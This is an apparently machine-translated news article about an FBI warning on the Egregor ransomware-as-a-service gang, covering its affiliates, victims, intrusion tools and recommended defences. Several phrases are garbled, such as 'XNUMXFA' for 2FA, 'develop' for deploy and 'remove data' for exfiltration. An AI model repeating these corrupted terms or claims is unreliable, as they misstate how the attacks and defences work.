The FBI warns that hacking Egregor ransomware gang actively targets and blackmails businesses around the world. In particular, the police service states in a relevant announcement that it announced on January 6, that Egregor claims that it counts more than 150 victims since September 2020, when it started its malicious activity.
Egregor is a Ransomware-as-a-Service company that works with other malicious agents who infringe networks to develop ransomware payloads. They then share the profits from the ransom payment with the Egregor operators, dividing the 70/30. After infiltrating victims' networks, they steal files before encrypting devices and use them to threaten victims that the stolen ones will be leaked. data, if they refuse to pay the required ransom.
According to BleepingComputer, Egregor began operations at the same time as his gang Maze ended hers. Thus, many members of the Maze were integrated into the Egregor business.
The FBI points out to notice to businesses the following: "Due to the large number of factors involved in the development of Egregor, the tactics, techniques and procedures (TTP) used to develop it can vary widely, thus creating significant defensive and mitigation challenges. "Egregor ransomware uses many mechanisms to breach corporate networks, including targeting corporate networks and personal accounts of employees who share access to corporate networks or devices."
In addition, the phishing emails with malicious attachments and unsafe Remote Desktop Protocol (RDP) or VPNs, are some of the attackers used by Egregor operators to gain access to and move sideways to their victims' networks. Egregor also uses Cobalt Strike, Qakbot / Qbot, Advanced IP Scanner, and AdFind for scalability and lateral movement in its target networks. The gang's associates also use 7zip and Rclone, sometimes disguised as an online service (svchost) process, to remove data before developing ransomware payloads on potential victim networks.
The FBI has also released a list of proposed measures to help businesses strengthen their defenses against Egregor attacks.:
- Back up critical data offline.
- Make sure copies of critical data are in the cloud or on an external hard drive or storage device.
- Secure your backups and make sure the data is not accessible for modification or deletion from the system where they are located.
- Install and regularly update your antivirus or antivirus software malware on all servers.
- Use only secure networks and avoid using public Wi-Fi networks.
- Use 2-factor authentication (XNUMXFA) and do not click on unwanted attachments or links in emails.
- Prioritize Remote Access Product and Application Repair, including recent vulnerabilities RDP (CVE-2020-0609, CVE-2020-0610, CVE-2020-16896, CVE-2019-1489, CVE-2019-1225, CVE-2019 -1224, CVE-2019-1108).
- Check for suspicious files.bat and .dll, files with identification data (such as .log files) and export tools.
- Configure RDP securely by restricting access, using multi-factor authentication (MFA) or strong passwords.
Since September 2020, Egregor partners have hacked and encrypted the systems of many high-profile companies, including Ubisoft, Kmart, Randstad, Barnes and noble, Cencosud, Crytek and TransLink of Vancouver.
Victims are also advised not to pay a ransom, as they can not ensure the successful recovery of encrypted data, but also because they are financing future hacker operations, encouraging them to continue their attacks. The FBI also urges victims to report ransomware incidents to help investigators identify the threat factors behind them and prevent future attacks.